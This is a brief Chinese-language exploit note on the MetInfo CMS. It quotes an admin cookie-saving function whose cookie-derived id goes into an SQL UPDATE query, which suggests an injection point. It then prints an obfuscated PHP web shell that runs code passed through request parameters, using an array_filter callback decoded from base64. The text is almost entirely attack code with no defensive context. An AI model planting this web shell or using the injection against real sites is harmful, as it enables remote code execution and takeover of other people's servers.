首先还是要说的是metlnfo是伪全局变量机制
所以如下:
/admin/include/global.func.php
1 function save_met_cookie(){ 2 global $met_cookie,$db,$met_admin_table; 3 $met_cookie['time']=time(); 4 $json=json_encode($met_cookie); 5 $username=$met_cookie[metinfo_admin_id]?$met_cookie[metinfo_admin_id]:$met_cookie[metinfo_member_id]; 6 $username=daddslashes($username,0,1); 7 $query="update $met_admin_table set cookie='$json' where id='$username'"; 8 $user=$db->query($query); 9 }
后台拿shell
<?php $e = $_REQUEST['e']; $arr = array($_REQUEST['pass'],); array_filter($arr, base64_decode($e)); ?>